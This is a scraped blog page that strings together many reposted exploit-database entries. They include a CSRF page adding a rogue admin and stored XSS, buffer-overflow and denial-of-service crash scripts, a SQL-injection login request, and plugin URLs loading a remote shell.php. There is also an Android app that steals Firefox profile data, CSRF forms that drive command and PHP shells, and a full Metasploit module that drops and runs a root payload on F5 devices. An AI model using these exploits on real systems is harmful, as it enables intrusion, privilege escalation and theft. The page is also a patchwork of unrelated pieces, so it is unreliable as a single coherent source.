source: https://www.securityfocus.com/bid/61964/info
Plone is prone to a session-hijacking vulnerability.
An attacker can exploit this issue to hijack user sessions and gain unauthorized access to the affected application.
Note: This issue was previously discussed in the BID 61544 (Plone Multiple Remote Security Vulnerabilities), but has been moved to its own record to better document it.
https://www.example.com/acl_users/credentials_cookie_auth/require_login?next=+https%3A//www.csnc.ch
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863147337
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/62010/info
cm3 Acora CMS is prone to an information-disclosure vulnerability.
Successful exploits of this issue lead to disclosure of sensitive information which may aid in launching further attacks.
http://www.example.com/AcoraCMS/Admin/top.aspx
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTQ4NjIxMDUxOQ9kFgJmD2QWAgIDD2QWAgIBD2QWCmYPFgIeBFRleHQFJERpZ2l0YWxTZWMgTmV0d29ya3MgV2Vic2l0ZWQCAQ8WAh8ABQpFbnRlcnByaXNlZAICDw8WAh8ABQt2NS40LjUvNGEtY2RkAgMPFgIfAAUgQW5vbnltb3VzIChQdWJsaWMgSW50ZXJuZXQgVXNlcilkAgQPDxYCHgdWaXNpYmxlaGRkZIL9u8OSlqqnBHGwtssOBV5lciAoCg" /></div>
source: https://www.securityfocus.com/bid/61974/info
SearchBlox is prone to multiple information-disclosure vulnerabilities.
Attackers can exploit these issues to obtain sensitive information that may aid in launching further attacks.
SearchBlox 7.4 Build 1 is vulnerable; other versions may also be affected.
http://www.example.com/searchblox/servlet/CollectionListServlet?action=getList&orderBy=colName&direction=asc
source: https://www.securityfocus.com/bid/62024/info
Nmap is prone to an arbitrary file-write vulnerability.
An attacker can exploit this issue to write arbitrary files with the permissions of the user running the nmap client. This will allow the attacker to fully compromise the affected machine.
Nmap 6.25 is vulnerable; other versions may also be affected.
nmap --script domino-enum-passwords -p 80 <evil_host> --script-args domino-enum-passwords.username='patrik karlsson',domino-enum-passwords.password=secret,domino-enum-passwords.idpath='/tmp'
source: https://www.securityfocus.com/bid/62036/info
Aloaha PDF Suite is prone to a stack-based buffer-overflow vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely cause denial-of-service conditions.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/62036.zip
source: https://www.securityfocus.com/bid/62064/info
Xibo is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
Xibo 1.4.2 is vulnerable; other versions may also be affected.
<html>
<head>
<title> Xibo - Digital Signage 1.4.2 CSRF Exploit.</title>
<!--
# CSRF Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
# Exploited by: Jacob Holcomb - Security Analyst @ Independnet Security Evaluators
# CVE: CSRF - CVE-2013-4889, XSS - CVE-2013-4888
# http://infosec42.blogspot.com
# http://securityevaluators.com
-->
</head>
<body>
<h1>Please wait... </h1>
<script type="text/javascript">
//Add super user
function RF1(){
document.write('<form name="addAdmin" target ="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=user&q=AddUser&ajax=true" method="post">'+
'<input type="hidden" name="userid" value="0">'+
'<input type="hidden" name="username" value="Gimppy">'+
'<input type="hidden" name="password" value="ISE">'+
'<input type="hidden" name="email" value="Gimppy@infosec42.com">'+
'<input type="hidden" name="usertypeid" value="1">'+
'<input type="hidden" name="groupid" value="1">'+
'</form>');
}
//Set XSS Payloads
function RF2(){
document.write('<form name="addXSS" target="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=layout&q=add&ajax=true" method="post">'+
'<input type="hidden" name="layoutid" value="0">'+
'<input type="hidden" name="layout" value="Gimppy<img src=42 onerror='alert(42)'>">'+
'<input type="hidden" name="description" value="<iframe src='http://securityevaluators.com' width=100 height=1000</iframe>">'+
'<input type="hidden" name="tags" value="">'+
'<input type="hidden" name="templateid" value="0">'+
'</form>');
}
function createPage(){
RF1();
RF2();
}
function _addAdmin(){
document.addAdmin.submit();
}
function _addXSS(){
document.addXSS.submit();
}
//Called Functions
createPage()
for (var i = 0; i < 2; i++){
if(i == 0){
window.setTimeout(_addAdmin, 0500);
}
else if(i == 1){
window.setTimeout(_addXSS, 1000);
}
else{
continue;
}
}
</script>
</body>
</html>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title : SuperScan 4.1 Scan Hostname/IP Field Buffer Overflow Crash PoC
# Discovery by : Luis Martínez
# Email : l4m5@hotmail.com
# Discovery Date : 18/11/2015
# Vendor Homepage : http://www.foundstone.com
# Software Link : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
# Tested Version : 4.1
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows XP Professional SP3 x86 es
# Steps to Produce the Crash:
# 1.- Run python code : python super_scan_4.1.py
# 2.- Open super_scan_4.1.txt and copy content to clipboard
# 3.- Open SuperScan4.1.exe
# 4.- Paste Clipboard Scan > Hostname/IP
# 5.- Clic on add button (->)
# 6.- Crashed
buffer = "\x41" * 636
eip = "\x42" * 4
f = open ("super_scan_4.1.txt", "w")
f.write(buffer + eip)
f.close()
# Exploit Title: [ZTE ADSL ZXV10 W300 modems - Multiple vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.zte.com.cn]
# Versions Reported: [W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57]
*CVE-ID*:
CVE-2015-7257
CVE-2015-7258
CVE-2015-7259
*Note*: Large deployment size, primarily in Peru, used by TdP.
1 *Insufficient authorization controls*
*CVE-ID*: CVE-2015-7257
Observed in Password Change functionality. Other functions may be
vulnerable as well.
*Expected behavior:*
Only administrative 'admin' user should be able to change password for all
the device users. 'support' is a diagnostic user with restricted
privileges. It can change only its own password.
*Vulnerability:*
Any non-admin user can change 'admin' password.
*Steps to reproduce:*
a. Login as user 'support' password XXX
b. Access Password Change page - http://<IP>/password.htm
c. Submit request
d. Intercept and Tamper the parameter username change from 'support' to
'admin'
e. Enter the new password > old password is not requested > Submit
> Login as admin
-> Pwn!
2 *Sensitive information disclosure - clear-text passwords*
*CVE-ID*: CVE-2015-7258
Displaying user information over Telnet connection, shows all valid users
and their passwords in clear-text.
*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
Username: admin
Password: < admin/XXX1
$sh
ADSL#login show <-- shows user information
Username Password Priority
admin password1 2
support password2 0
admin password3 1
3 *(Potential) Backdoor account feature - **insecure account management*
*CVE-ID*: CVE-2015-7259
Same login account can exist on the device, multiple times, each with
different priority#. It is possible to log in to device with either of the
username/password combination.
It is considered as a (redundant) login support *feature*.
*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
User Access Verification
Username: admin
Password: <-- admin/password3
$sh
ADSL#login show
Username Password Priority
admin password1 2
support password2 0
admin password3 1
+++++
--
Best Regards,
Karn Ganeshen
source: https://www.securityfocus.com/bid/62586/info
ShareKM is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to cause the server to crash or disconnect, denying service to legitimate users.
ShareKM 1.0.19 is vulnerable; prior versions may also be affected.
#!/usr/bin/python
import socket
TCP_IP = '192.168.1.100'
TCP_PORT = 55554
BUFFER_SIZE = 1024
MESSAGE = "\x41" * 50000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
s.send(MESSAGE)
s.close()
source: https://www.securityfocus.com/bid/62581/info
MentalJS is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass sandbox security restrictions and perform unauthorized actions; this may aid in launching further attacks.
http://www.example.com/demo/demo-deny-noescape.html?test=%3Cscript%3Edocument.body.innerHTML=%22%3Cform+onmouseover=javascript:alert(0);%3E%3Cinput+name=attributes%3E%22;%3C/script%3E
source: https://www.securityfocus.com/bid/62572/info
Monstra CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Monstra 1.2.0 is vulnerable; other versions may also be affected.
POST /admin/ HTTP/1.1
Content-Length: 72
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=f6bd4782f77e4027d3975d32c414a36d
Host: XXX
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
login=-1' or 85 = '83&login_submit=Enter&password=lincoln.dll
source: https://www.securityfocus.com/bid/62513/info
The RokMicroNews plugin for WordPress is prone to multiple security vulnerabilities, including:
1. An information-disclosure vulnerability
2. A cross-site scripting vulnerability
3. An arbitrary file-upload vulnerability
4. A denial-of-service vulnerability
Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, perform a denial-of-service attack, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://
http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://www.example1.com/big_file&h=1&w=1
http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://www.example2.com/shell.php
source: https://www.securityfocus.com/bid/62493/info
The RokIntroScroller plugin for WordPress is prone to multiple security vulnerabilities, including:
1. An arbitrary file-upload vulnerability
2. A cross-site scripting vulnerability
3. An information-disclosure vulnerability
4. A denial-of-service vulnerability
Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, perform a denial-of-service attack, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
RokIntroScroller 1.8 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://www.example2.com/page.png&h=1&w=1111111
http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://www.example2.com/big_file&h=1&w=1
http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://www.example2.com/shell.php
http://www.example.com/wp-content/plugins/wp_rokintroscroller/rokintroscroller.php
source: https://www.securityfocus.com/bid/62480/info
Mozilla Firefox is prone to a security-bypass vulnerability.
Attackers can exploit this issue to bypass the same-origin policy and certain access restrictions to access data, or execute arbitrary script code in the browser of an unsuspecting user in the context of another site. This could be used to steal sensitive information or launch other attacks.
Note: This issue was previously discussed in BID 62447 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2013-76 through -92 Multiple Vulnerabilities), but has been moved to its own record to better document it.
This issue is fixed in Firefox 24.0.
ckage jp.mbsd.terada.attackfirefox1;
import android.net.Uri;
import android.os.Bundle;
import android.app.Activity;
import android.content.Intent;
public class MainActivity extends Activity {
public final static String MY_PKG =
"jp.mbsd.terada.attackfirefox1";
public final static String MY_TMP_DIR =
"/data/data/" + MY_PKG + "/tmp/";
public final static String HTML_PATH =
MY_TMP_DIR + "A" + Math.random() + ".html";
public final static String TARGET_PKG =
"org.mozilla.firefox";
public final static String TARGET_FILE_PATH =
"/data/data/" + TARGET_PKG + "/files/mozilla/profiles.ini";
public final static String HTML =
"<u>Wait a few seconds.</u>" +
"<script>" +
"function doit() {" +
" var xhr = new XMLHttpRequest;" +
" xhr.onload = function() {" +
" alert(xhr.responseText);" +
" };" +
" xhr.open('GET', document.URL);" +
" xhr.send(null);" +
"}" +
"setTimeout(doit, 8000);" +
"</script>";
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
doit();
}
public void doit() {
try {
// create a malicious HTML
cmdexec("mkdir " + MY_TMP_DIR);
cmdexec("echo \"" + HTML + "\" > " + HTML_PATH);
cmdexec("chmod -R 777 " + MY_TMP_DIR);
Thread.sleep(1000);
// force Firefox to load the malicious HTML
invokeFirefox("file://" + HTML_PATH);
Thread.sleep(4000);
// replace the HTML with a symbolic link to profiles.ini
cmdexec("rm " + HTML_PATH);
cmdexec("ln -s " + TARGET_FILE_PATH + " " + HTML_PATH);
}
catch (Exception e) {}
}
public void invokeFirefox(String url) {
Intent intent = new Intent(Intent.ACTION_VIEW, Uri.parse(url));
intent.setClassName(TARGET_PKG, TARGET_PKG + ".App");
startActivity(intent);
}
public void cmdexec(String cmd) {
try {
String[] tmp = new String[] {"/system/bin/sh", "-c", cmd};
Runtime.getRuntime().exec(tmp);
}
catch (Exception e) {}
}
}
Advisory ID: HTB23272
Product: Horde Groupware
Vendor: http://www.horde.org
Vulnerable Version(s): 5.2.10 and probably prior
Tested Version: 5.2.10
Advisory Publication: September 30, 2015 [without technical details]
Vendor Notification: September 30, 2015
Vendor Patch: October 22, 2015
Public Disclosure: November 18, 2015
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2015-7984
Risk Level: High
CVSSv3 Base Score: 8.3 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered three Cross-Site Request Forgery (CSRF) vulnerabilities in a popular collaboration suite Horde Groupware, used by a variety of companies around the world. These vulnerabilities are very dangerous, since they can be used in targeted attacks against corporate clients. An attacker might be able to gain unauthorized access to information, stored in database, execute arbitrary commands on the server, compromise the entire application and perform attacks against application users and company’s infrastructure.
1) Cross-Site Request Forgery in Horde Groupware: CVE-2015-7984
1.1 The vulnerability exists due to failure in the "/admin/cmdshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary system commands on the server.
CSRF exploit below sends HTTP POST request to vulnerable script and instructs it to display output of "/bin/ls" command. As a result, you will see contents of "/admin/" directory:
<form action="http://[host]/admin/cmdshell.php" method="post" name="main">
<input type="hidden" name="cmd" value="ls">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>
1.2 The vulnerability exists due to failure in the "/admin/sqlshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary SQL queries with application’s database.
The exploit code below executes "SELECT version()" query and displays version of current MySQL server:
<form action="http://[host]/admin/sqlshell.php" method="post" name="main">
<input type="hidden" name="sql" value="SELECT version()">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>
1.3 The vulnerability exists due to failure in the "/admin/phpshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary php code on the server.
The exploit code below executes the "phpinfo()" function and displays its output:
<form action="http://[host]/admin/phpshell.php" method="post" name="main">
<input type="hidden" name="app" value="horde">
<input type="hidden" name="php" value="phpinfo();">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>
-----------------------------------------------------------------------------------------------
Solution:
Update to Horde Groupware 5.2.11
More Information:
http://lists.horde.org/archives/announce/2015/001137.html
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23272 - https://www.htbridge.com/advisory/HTB23272 - Multiple CSRF Vulnerabilities in Horde Groupware.
[2] Horde Groupware - http://www.horde.org - Horde Groupware is a free, enterprise ready, browser based collaboration suite.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'nokogiri'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
SOAPENV_ENCODINGSTYLE = { "soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/" }
STRING_ATTRS = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
LONG_ATTRS = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' }
def initialize(info = {})
super(
update_info(
info,
'Name' => "F5 iControl iCall::Script Root Command Execution",
'Description' => %q{
This module exploits an authenticated privilege escalation
vulnerability in the iControl API on the F5 BIG-IP LTM (and likely
other F5 devices). This requires valid credentials and the Resource
Administrator role. The exploit should work on BIG-IP 11.3.0
- 11.6.0, (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references
for more details)
},
'License' => MSF_LICENSE,
'Author' =>
[
'tom', # Discovery, Metasploit module
'Jon Hart <jon_hart[at]rapid7.com>' # Metasploit module
],
'References' =>
[
['CVE', '2015-3628'],
['URL', 'https://support.f5.com/kb/en-us/solutions/public/16000/700/sol16728.html'],
['URL', 'https://gdssecurity.squarespace.com/labs/2015/9/8/f5-icallscript-privilege-escalation-cve-2015-3628.html']
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['F5 BIG-IP LTM 11.x', {}]
],
'Privileged' => true,
'DisclosureDate' => "Sep 3 2015",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/iControl/iControlPortal.cgi']),
OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),
OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])
])
register_advanced_options(
[
OptInt.new('SESSION_WAIT', [ true, 'The max time to wait for a session, in seconds', 5 ]),
OptString.new('PATH', [true, 'Filesystem path for the dropped payload', '/tmp']),
OptString.new('FILENAME', [false, 'File name of the dropped payload, defaults to random']),
OptInt.new('ARG_MAX', [true, 'Command line length limit', 131072])
])
end
def setup
file = datastore['FILENAME']
file ||= ".#{Rex::Text.rand_text_alphanumeric(16)}"
@payload_path = ::File.join(datastore['PATH'], file)
super
end
def build_xml
builder = Nokogiri::XML::Builder.new do |xml|
xml.Envelope do
xml = xml_add_namespaces(xml)
xml['soapenv'].Header
xml['soapenv'].Body do
yield xml
end
end
end
builder.to_xml
end
def xml_add_namespaces(xml)
ns = xml.doc.root.add_namespace_definition("soapenv", "http://schemas.xmlsoap.org/soap/envelope/")
xml.doc.root.namespace = ns
xml.doc.root.add_namespace_definition("xsi", "http://www.w3.org/2001/XMLSchema-instance")
xml.doc.root.add_namespace_definition("xsd", "http://www.w3.org/2001/XMLSchema")
xml.doc.root.add_namespace_definition("scr", "urn:iControl:iCall/Script")
xml.doc.root.add_namespace_definition("soapenc", "http://schemas.xmlsoap.org/soap/encoding")
xml.doc.root.add_namespace_definition("per", "urn:iControl:iCall/PeriodicHandler")
xml
end
def send_soap_request(pay)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path),
'method' => 'POST',
'data' => pay,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
)
if res
return res
else
vprint_error('No response')
end
false
end
def create_script(name, cmd)
create_xml = build_xml do |xml|
xml['scr'].create(SOAPENV_ENCODINGSTYLE) do
xml.scripts(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item name
end
xml.definitions(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item cmd
end
end
end
send_soap_request(create_xml)
end
def delete_script(script_name)
delete_xml = build_xml do |xml|
xml['scr'].delete_script(SOAPENV_ENCODINGSTYLE) do
xml.scripts(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item script_name
end
end
end
print_error("Error while cleaning up script #{script_name}") unless (res = send_soap_request(delete_xml))
res
end
def script_exists?(script_name)
exists_xml = build_xml do |xml|
xml['scr'].get_list(SOAPENV_ENCODINGSTYLE)
end
res = send_soap_request(exists_xml)
res && res.code == 200 && res.body =~ Regexp.new("/Common/#{script_name}")
end
def create_handler(handler_name, script_name)
print_status("Creating trigger #{handler_name}")
handler_xml = build_xml do |xml|
xml['per'].create(SOAPENV_ENCODINGSTYLE) do
xml.handlers(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item handler_name
end
xml.scripts(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item script_name
end
xml.intervals(LONG_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
# we set this to run once every 24h, but because there is no
# start/end time it will run once, more or less immediately, and
# again 24h from now, but by that point hopefully we will have
# cleaned up and the handler/script/etc are gone
xml.item 60 * 60 * 24
end
end
end
res = send_soap_request(handler_xml)
if res
if res.code == 200 && res.body =~ Regexp.new("iCall/PeriodicHandler")
true
else
print_error("Trigger creation failed -- HTTP/#{res.proto} #{res.code} #{res.message}")
false
end
else
print_error("No response to trigger creation")
false
end
end
def delete_handler(handler_name)
delete_xml = build_xml do |xml|
xml['per'].delete_handler(SOAPENV_ENCODINGSTYLE) do
xml.handlers(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item handler_name
end
end
end
print_error("Error while cleaning up handler #{handler_name}") unless (res = send_soap_request(delete_xml))
res
end
def handler_exists?(handler_name)
handler_xml = build_xml do |xml|
xml['per'].get_list(SOAPENV_ENCODINGSTYLE)
end
res = send_soap_request(handler_xml)
res && res.code == 200 && res.body =~ Regexp.new("/Common/#{handler_name}")
end
def check
# strategy: we'll send a create_script request, with empty name:
# if everything is ok, the server return a 500 error saying it doesn't like empty names
# XXX ignored at the moment: if the user doesn't have enough privileges, 500 error also is returned, but saying 'access denied'.
# if the user/password is wrong, a 401 error is returned, the server might or might not be vulnerable
# any other response is considered not vulnerable
res = create_script('', '')
if res && res.code == 500 && res.body =~ /path is empty/
return Exploit::CheckCode::Appears
elsif res && res.code == 401
print_warning("HTTP/#{res.proto} #{res.code} #{res.message} -- incorrect USERNAME or PASSWORD?")
return Exploit::CheckCode::Unknown
else
return Exploit::CheckCode::Safe
end
end
def exploit
# phase 1: create iCall script to create file with payload, execute it and remove it.
shell_cmd = %(echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode >#{@payload_path}; chmod +x #{@payload_path};#{@payload_path})
cmd = %(exec /bin/sh -c "#{shell_cmd}")
arg_max = datastore['ARG_MAX']
if shell_cmd.size > arg_max
print_error "Payload #{datastore['PAYLOAD']} is too big, try a different payload "\
"or increasing ARG_MAX (note that payloads bigger than the target's configured ARG_MAX value may fail to execute)"
return false
end
script_name = "script-#{Rex::Text.rand_text_alphanumeric(16)}"
print_status("Uploading payload script #{script_name}")
unless (create_script_res = create_script(script_name, cmd))
print_error("No response when uploading payload script")
return false
end
unless create_script_res.code == 200
print_error("Upload payload script failed -- HTTP/#{create_script_res.proto} "\
"#{create_script_res.code} #{create_script_res.message}")
return false
end
unless script_exists?(script_name)
print_error("Payload script uploaded successfully but script was not found")
return false
end
register_file_for_cleanup @payload_path
# phase 2: create iCall Handler, that will actually run the previously created script
handler_name = "handler-#{Rex::Text.rand_text_alphanumeric(16)}"
unless create_handler(handler_name, script_name)
delete_script(script_name)
return false
end
unless handler_exists?(handler_name)
print_error("Trigger created successfully but was not found")
delete_script(script_name)
return false
end
print_status('Waiting for payload to execute...')
# if our payload has not been successfully executed just yet, wait
# until it does or give up
slept = 0
until session_created? || slept > datastore['SESSION_WAIT']
Rex.sleep(1)
slept += 1
end
print_status('Trying cleanup...')
delete_script(script_name)
delete_handler(handler_name)
end
end
Source: https://code.google.com/p/google-security-research/issues/detail?id=513
There's an integer overflow issue in sanity checking section lengths when parsing the vcdiff format (used in SDCH content encoding). This results in the parser parsing outside of sane memory bounds when parsing the contents of a vcdiff window - see attached crash PoC.
(/src/sdch/open-vcdiff/src/headerparser.cc)
bool VCDiffHeaderParser::ParseSectionLengths(
bool has_checksum,
size_t* add_and_run_data_length,
size_t* instructions_and_sizes_length,
size_t* addresses_length,
VCDChecksum* checksum) {
ParseSize("length of data for ADDs and RUNs", add_and_run_data_length); // <---- user controlled
ParseSize("length of instructions section", instructions_and_sizes_length); // <---- user controlled
ParseSize("length of addresses for COPYs", addresses_length); // <---- user controlled
if (has_checksum) {
ParseChecksum("Adler32 checksum value", checksum);
}
if (RESULT_SUCCESS != return_code_) {
return false;
}
if (!delta_encoding_start_) {
VCD_DFATAL << "Internal error: VCDiffHeaderParser::ParseSectionLengths "
"was called before ParseWindowLengths" << VCD_ENDL;
return_code_ = RESULT_ERROR;
return false;
}
const size_t delta_encoding_header_length =
UnparsedData() - delta_encoding_start_;
if (delta_encoding_length_ !=
(delta_encoding_header_length +
*add_and_run_data_length +
*instructions_and_sizes_length +
*addresses_length)) { // <---- Integer overflow here (32-bit systems only)
VCD_ERROR << "The length of the delta encoding does not match "
"the size of the header plus the sizes of the data sections"
<< VCD_ENDL;
return_code_ = RESULT_ERROR;
return false;
}
return true;
}
These returned lengths are subsequently used to initialise length-checked buffer objects for continuing the parsing (vcdecoder.cc:1024)
size_t add_and_run_data_length = 0;
size_t instructions_and_sizes_length = 0;
size_t addresses_length = 0;
if (!header_parser->ParseSectionLengths(has_checksum_,
&add_and_run_data_length,
&instructions_and_sizes_length,
&addresses_length,
&expected_checksum_)) {
return header_parser->GetResult();
}
if (parent_->AllowInterleaved() &&
// snip...
} else {
// If interleaved format is not used, then the whole window contents
// must be available before decoding can begin. If only part of
// the current window is available, then report end of data
// and re-parse the whole header when DecodeChunk() is called again.
if (header_parser->UnparsedSize() < (add_and_run_data_length +
instructions_and_sizes_length +
addresses_length)) {
return RESULT_END_OF_DATA;
}
data_for_add_and_run_.Init(header_parser->UnparsedData(),
add_and_run_data_length);
instructions_and_sizes_.Init(data_for_add_and_run_.End(),
instructions_and_sizes_length);
addresses_for_copy_.Init(instructions_and_sizes_.End(), addresses_length);
This issue only affects 32-bit builds, since ParseSize is parsing a positive int32_t; on 64-bit builds it cannot be large enough to wrap a size_t.
It's unclear if this is exploitable as a browser-process infoleak; the results of SDCH decoding will be returned to a renderer process, but the way that the returned values are used mean that it is likely that the process will have to survive reads at opposite ends of the address space, which *should* be guaranteed to crash with a 2:2 address space split. It is possible that on 32-bit Windows with a 1:3 address space split this can be survived, or with careful crafting of the input file these reads can be avoided; I've not investigated further at this point.
It appears to be necessary to host the PoC on a legitimate domain; as localhost is not supported for SDCH.
VERSION
Chrome Version: 47.0.2499.0
Operating System: Linux x86
REPRODUCTION CASE
Please include a demonstration of the security bug, such as an attached
HTML or binary file that reproduces the bug when loaded in Chrome. PLEASE
make the file as small as possible and remove any content not required to
demonstrate the bug.
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: browser
Crash State:
eax 0xf9ae8a78 -106001800
ecx 0xe7502d43 -414175933
edx 0x7b83e020 2072240160
ebx 0xf76597a0 -144336992
esp 0xe75025d0 0xe75025d0
ebp 0xe7502798 0xe7502798
esi 0x5 5
edi 0xf9061200 -117042688
eip 0xf1ddebee 0xf1ddebee <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+94>
eflags 0x210a93 [ CF AF SF IF OF RF ID ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
=> 0xf1ddebee <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+94>: movzbl (%edx),%ecx
0xf1ddebf1 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+97>: mov (%edi),%esi
0xf1ddebf3 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+99>: cmpb $0x0,0x100(%esi,%ecx,1)
0xf1ddebfb <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+107>: je 0xf1ddec06 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+118>
0xf1ddebfd <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+109>: movsbl %cl,%edx
#0 open_vcdiff::VCDiffCodeTableReader::GetNextInstruction (this=0xf9061200, size=0x5, mode=0xf9ae8a78 " \340\203{Ox\a\376\001") at ../../sdch/open-vcdiff/src/decodetable.cc:78
#1 0xf1ddcab5 in open_vcdiff::VCDiffDeltaFileWindow::DecodeBody (this=0xf90611c4, parseable_chunk=<optimized out>) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1231
